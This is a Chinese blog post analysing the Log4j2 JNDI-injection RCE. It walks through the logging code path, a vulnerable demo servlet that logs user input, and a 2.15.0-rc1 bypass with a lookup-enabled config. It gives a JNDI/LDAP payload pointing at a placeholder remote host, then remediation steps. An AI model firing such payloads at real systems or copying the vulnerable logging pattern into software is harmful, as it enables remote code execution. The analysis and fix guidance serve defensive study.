<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Log4j2 RCE本质上是一个JNDI注入，屌得一批，之前掀起大热。 Log4j?简单点，就是一个拿来打印日志的库，Log4j2是Log4j超级增强版。 分析  影响范围 Java类产品：Apache Log4j 2.x &lt; 2.15.0-rc2 受影响的应用及组件（包括但不限于）如下：Apache Solr、Apache Flink、Apache Druid、Apache Struts2">
<meta property="og:type" content="article">
<meta property="og:title" content="Log4j2的RCE浅析">
<meta property="og:url" content="http://const27.com/2022/01/30/Log4j2%20RCE/index.html">
<meta property="og:site_name" content="ConsT27&#39;s Blog">
<meta property="og:description" content="Log4j2 RCE本质上是一个JNDI注入，屌得一批，之前掀起大热。 Log4j?简单点，就是一个拿来打印日志的库，Log4j2是Log4j超级增强版。 分析  影响范围 Java类产品：Apache Log4j 2.x &lt; 2.15.0-rc2 受影响的应用及组件（包括但不限于）如下：Apache Solr、Apache Flink、Apache Druid、Apache Struts2">
<meta property="og:locale">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_1.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_2.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_3.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_4.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_5.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_6.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_7.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_8.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_9.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_10.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_11.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_12.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_13.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_14.png">
<meta property="og:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image_15.png">
<meta property="article:published_time" content="2022-01-30T12:52:21.229Z">
<meta property="article:modified_time" content="2022-01-30T12:53:24.010Z">
<meta property="article:author" content="ConsT27">
<meta property="article:tag" content="java安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://const27.com/2022/01/30/Log4j2%20RCE/image/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Log4j2的RCE浅析</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="ConsT27's Blog" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Inici</a></li><!--
     --><!--
       --><li><a href="/about/">Qui som</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Post Anterior" href="/2022/01/30/RMI%20ATTACK/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Post Següent" href="/2022/01/30/C3P0%E9%93%BE/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Adalt" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Compartir Post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://const27.com/2022/01/30/Log4j2%20RCE/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://const27.com/2022/01/30/Log4j2%20RCE/&text=Log4j2的RCE浅析"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://const27.com/2022/01/30/Log4j2%20RCE/&is_video=false&description=Log4j2的RCE浅析"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Log4j2的RCE浅析&body=Check out this article: http://const27.com/2022/01/30/Log4j2%20RCE/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://const27.com/2022/01/30/Log4j2%20RCE/&name=Log4j2的RCE浅析&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://const27.com/2022/01/30/Log4j2%20RCE/&t=Log4j2的RCE浅析"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Log4j2-RCE"><span class="toc-number">1.</span> <span class="toc-text">Log4j2 RCE</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Log4j"><span class="toc-number">2.</span> <span class="toc-text">Log4j?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.0.1.</span> <span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-15-0-RC1%E7%BB%95%E8%BF%87"><span class="toc-number">3.1.</span> <span class="toc-text">2.15.0 RC1绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RC2%E4%BF%AE%E5%A4%8D"><span class="toc-number">3.2.</span> <span class="toc-text">RC2修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reference"><span class="toc-number">4.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Log4j2的RCE浅析
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">ConsT27</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-30T12:52:21.229Z" itemprop="datePublished">2022-01-30</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/java%E5%AE%89%E5%85%A8/" rel="tag">java安全</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="Log4j2-RCE"><a href="#Log4j2-RCE" class="headerlink" title="Log4j2 RCE"></a>Log4j2 RCE</h1><p>本质上是一个JNDI注入，屌得一批，之前掀起大热。</p>
<h1 id="Log4j"><a href="#Log4j" class="headerlink" title="Log4j?"></a>Log4j?</h1><p>简单点，就是一个拿来打印日志的库，Log4j2是Log4j超级增强版。</p>
<h1 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h1><p><img src="image/image.png"></p>
<blockquote>
<p>影响范围 Java类产品：Apache Log4j 2.x &lt; 2.15.0-rc2 受影响的应用及组件（包括但不限于）如下：Apache Solr、Apache Flink、Apache Druid、Apache Struts2、pring-boot-strater-log4j2等。（来自腾讯云社区）</p>
</blockquote>
<p>建立一个servlet（嫖自腾讯云社区）</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="meta">@WebServlet(name = &quot;ServletDemo&quot;, value = &quot;/ServletDemo&quot;)</span>  </span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">ServletDemo</span> <span class="keyword">extends</span> <span class="title">HttpServlet</span> </span>&#123;  </span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doGet</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> <span class="keyword">throws</span> IOException </span>&#123;  </span><br><span class="line">          Logger logger = LogManager.getLogger(ServletDemo.class.getName());  </span><br><span class="line">          PrintWriter printWriter = response.getWriter();  </span><br><span class="line">          printWriter.println(<span class="string">&quot;Log4j2 JNDI injection&quot;</span>);  </span><br><span class="line">          String payload  = request.getParameter(<span class="string">&quot;msg&quot;</span>);  </span><br><span class="line"><span class="keyword">if</span> (payload == <span class="keyword">null</span>)&#123;  </span><br><span class="line">              payload = <span class="string">&quot;input msg parameter: ?msg=helloworld&quot;</span>;  </span><br><span class="line">          &#125;  </span><br><span class="line">          printWriter.println(<span class="string">&quot;execute paylaod: &quot;</span> + payload);  </span><br><span class="line">          logger.error(payload);  </span><br><span class="line">          printWriter.flush();  </span><br><span class="line">          printWriter.close();  </span><br><span class="line">      &#125;  </span><br><span class="line"></span><br><span class="line"><span class="meta">@Override</span></span><br><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doPost</span><span class="params">(HttpServletRequest request, HttpServletResponse response)</span> <span class="keyword">throws</span> IOException </span>&#123;  </span><br><span class="line">          Logger logger = LogManager.getLogger(ServletDemo.class.getName());  </span><br><span class="line">          PrintWriter printWriter = response.getWriter();  </span><br><span class="line">          printWriter.println(<span class="string">&quot;Log4j2 JNDI injection&quot;</span>);  </span><br><span class="line">          String payload  = request.getParameter(<span class="string">&quot;msg&quot;</span>);  </span><br><span class="line"><span class="keyword">if</span> (payload == <span class="keyword">null</span>)&#123;  </span><br><span class="line">              payload = <span class="string">&quot;input msg parameter: ?msg=helloworld&quot;</span>;  </span><br><span class="line">          &#125;  </span><br><span class="line">          printWriter.println(<span class="string">&quot;execute paylaod: &quot;</span> + payload);  </span><br><span class="line">          logger.error(payload);  </span><br><span class="line">          printWriter.flush();  </span><br><span class="line">          printWriter.close();  </span><br><span class="line">      &#125;  </span><br><span class="line">  &#125;</span><br></pre></td></tr></table></figure>

<p>正常运行时，logger.error会把日志输出到服务器面板。</p>
<p><img src="image/image_1.png"></p>
<p>我们跟进一下这个logger.error。<br>下断点，调试开搞。</p>
<p><img src="image/image_2.png"></p>
<p><img src="image/image_3.png"></p>
<p><img src="image/image_4.png"></p>
<p><img src="image/image_5.png"></p>
<p>先调用logIfEnabled函数判断当前事件类型的优先级，如果优先级不够就不会进行之后的代码操作</p>
<blockquote>
<p>日志级别</p>
</blockquote>
<p>log4j2作为一个日志处理组件，它对日志事件的优先级进行了分类以方便后续的处理<br>其内置的日志级别标准如下，各个级别（intLevel）由数值表示，级别越高数值越小。</p>
<p><img src="image/image_6.png"></p>
<p>在上面对logIfEnabled的跟进过程中我们可以看到，只有当intLevel &gt;= level.intLevel()，即当前事件的intLevel小于intLevel常量值时才会继续进行代码。<br>而默认的intLevel常量值为200，即error级别，这就意味着在默认情况下只有优先级大于等于error的事件才会继续执行代码，启用日志打印。（本文是用的logger.error触发，所以同理也可以用logger.fatal触发）<br>这个intLevel常量值可以通过配置文件和Configurator.setLevel函数进行修改，这里就不再赘述。</p>
<p>将断点断在<code>org/apache/logging/log4j/core/appender/AbstractOutputStreamAppender.java</code>中的<code>directEncodeEvent</code>，继续调试</p>
<p><img src="image/image_7.png"></p>
<blockquote>
<p>模式布局</p>
</blockquote>
<p>这里的getLayout方法会获取日志打印的模式布局，也就是日志的格式化形式。 默认的模式布局为%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %level %logger{36} - %msg%n，也就是上图中的那样。<br>当在解析这串格式化字符串时时，会结合<code>List&lt;PatternConverter&gt;</code>转换器列表和<code>List&lt;FormattingInfo&gt;</code>格式信息列表这两个列表进行格式化。<br>格式化字符串中我们可以看到有如%d，%t等一系列占位符，这些占位符的意义是用于标识转换器，表示当前位置的字符串应该由何种转换器处理。</p>
<p><img src="image/image_8.png"></p>
<p>接下来我们跟进encode方法</p>
<p><img src="image/image_9.png"></p>
<p>toSerializable方法中会先获取<code>PatternConverter</code> 转换器列表，然后用不同的转换器处理传入的数据</p>
<p><img src="image/image_10.png"></p>
<p><img src="image/image_11.png"></p>
<p>log4j2 rce是MessagePatternConverter这个转换器出了问题，所以我们快进到MessagePatternConverter#format<br>它最开始会先去获得当前event信息中的message信息<br>然后在后面判断config与noLookups属性的状况<br>再然后（重点）去判断msg信息中是否存在字符串“${”，如果存在就会把$及后面的字符串切割出来存放到变量value中，于132行将其作为参数传入replace方法<br>最终传入到InitialContext.lookup参数中，完成jndi注入</p>
<p><img src="image/image_12.png"></p>
<p><img src="image/image_13.png"></p>
<p><img src="image/image_14.png"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>在log4j2中如果触发了error级别以上的事件，log4j2会调用不同转换器去分析事件用于格式化输出的日志，在MessagePatternConverter这个转换器中会去获取事件中的message信息（也就是传入logger.error等函数中的String参数）进行处理，如果message信息中存在”${“字符串，就会根据${}中内容的prefix选取对应的Lookup处理器进行处理，如果是prefix是jndi就会造成jndi注入</p>
<h2 id="2-15-0-RC1绕过"><a href="#2-15-0-RC1绕过" class="headerlink" title="2.15.0 RC1绕过"></a>2.15.0 RC1绕过</h2><p>前提条件：目标环境的log4j2配置文件中的%msg改成了%msg{lookup} ，或者通过API动态修改启用了lookup<br>just like this</p>
<figure class="highlight"><table><tr><td class="code"><pre><span class="line">&lt;?xml version=<span class="string">&quot;1.0&quot;</span> encoding=<span class="string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="line">&lt;Configuration status=<span class="string">&quot;WARN&quot;</span>&gt;</span><br><span class="line">    &lt;Appenders&gt;</span><br><span class="line">        &lt;Console name=<span class="string">&quot;Console&quot;</span> target=<span class="string">&quot;SYSTEM_OUT&quot;</span>&gt;</span><br><span class="line">            &lt;PatternLayout pattern=<span class="string">&quot;[%-level]%d&#123;HH:mm:ss.SSS&#125; [%t] %-5level %logger&#123;36&#125; - %msg&#123;lookups&#125;%n&quot;</span>/&gt;</span><br><span class="line">        &lt;/Console&gt;</span><br><span class="line">    &lt;/Appenders&gt;</span><br><span class="line">    &lt;Loggers&gt;</span><br><span class="line">        &lt;Root level=<span class="string">&quot;info&quot;</span>&gt;</span><br><span class="line">            &lt;AppenderRef ref=<span class="string">&quot;Console&quot;</span>/&gt;</span><br><span class="line">        &lt;/Root&gt;</span><br><span class="line">    &lt;/Loggers&gt;</span><br><span class="line">&lt;/Configuration&gt;</span><br></pre></td></tr></table></figure>

<p>但这个前提条件属实苛刻，所以这个绕过也属实有点鸡肋。</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">payload:</span><br><span class="line">$&#123;jndi:ldap:<span class="comment">//xxx.xxx.xxx.xxx:xxxx/ ExportObject&#125;  在host/后加了个空格</span></span><br></pre></td></tr></table></figure>

<p>简要分析过程：在进行jndilookup操作时，会判断host是否是白名单里的host(均为内网ip或域名)，如果我们在host/后加一个空格，就会导致其校验函数抛出错误，但是抛出错误后程序并没有进行相应处理，导致最后进行了成功lookup</p>
<p><img src="image/image_15.png"></p>
<blockquote>
<p>修复建议</p>
</blockquote>
<p>（引用自安全客平台）</p>
<p>修复建议：</p>
<ol>
<li>升级Apache Log4j2所有相关应用到最新版。</li>
<li>升级JDK版本，建议JDK使用11.0.1、8u191、7u201、6u211及以上的高版本。但仍有绕过Java本身对Jndi远程加载类安全限制的风险。</li>
</ol>
<p>临时建议：</p>
<ol>
<li>jvm中添加参数 -Dlog4j2.formatMsgNoLookups=true <strong>（版本&gt;=2.10.0）</strong></li>
<li>新建log4j2.component.properties文件，其中加上配置log4j2.formatMsgNoLookups=true <strong>（版本&gt;=2.10.0）</strong></li>
<li>设置系统环境变量：LOG4J_FORMAT_MSG_NO_LOOKUPS=true <strong>（版本&gt;=2.10.0）</strong></li>
<li>对于log4j2 &lt; 2.10以下的版本，可以通过移除JndiLookup类的方式。</li>
</ol>
<h2 id="RC2修复"><a href="#RC2修复" class="headerlink" title="RC2修复"></a>RC2修复</h2><figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">try</span>&#123;</span><br><span class="line">&#125; <span class="keyword">catch</span> (URISyntaxException ex) &#123;</span><br><span class="line">    LOGGER.warn(<span class="string">&quot;Invalid JNDI URI - &#123;&#125;&quot;</span>, name);</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> (T) <span class="keyword">this</span>.context.lookup(name);</span><br></pre></td></tr></table></figure>

<p>catch里直接return了。</p>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/263325#h2-6">https://www.anquanke.com/post/id/263325#h2-6</a></p>
<p><a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1917881">https://cloud.tencent.com/developer/article/1917881</a></p>
<p><a target="_blank" rel="noopener" href="http://wjlshare.com/archives/1674">http://wjlshare.com/archives/1674</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/10649#toc-2">https://xz.aliyun.com/t/10649#toc-2</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Log4j2-RCE"><span class="toc-number">1.</span> <span class="toc-text">Log4j2 RCE</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Log4j"><span class="toc-number">2.</span> <span class="toc-text">Log4j?</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">3.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-number">3.0.1.</span> <span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-15-0-RC1%E7%BB%95%E8%BF%87"><span class="toc-number">3.1.</span> <span class="toc-text">2.15.0 RC1绕过</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RC2%E4%BF%AE%E5%A4%8D"><span class="toc-number">3.2.</span> <span class="toc-text">RC2修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Reference"><span class="toc-number">4.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://const27.com/2022/01/30/Log4j2%20RCE/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://const27.com/2022/01/30/Log4j2%20RCE/&text=Log4j2的RCE浅析"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://const27.com/2022/01/30/Log4j2%20RCE/&is_video=false&description=Log4j2的RCE浅析"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Log4j2的RCE浅析&body=Check out this article: http://const27.com/2022/01/30/Log4j2%20RCE/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://const27.com/2022/01/30/Log4j2%20RCE/&title=Log4j2的RCE浅析"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://const27.com/2022/01/30/Log4j2%20RCE/&name=Log4j2的RCE浅析&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://const27.com/2022/01/30/Log4j2%20RCE/&t=Log4j2的RCE浅析"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2022
    ConsT27
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Inici</a></li><!--
     --><!--
       --><li><a href="/about/">Qui som</a></li><!--
     --><!--
       --><li><a href="/archives/">Articles</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/ConsT27">Projectes</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
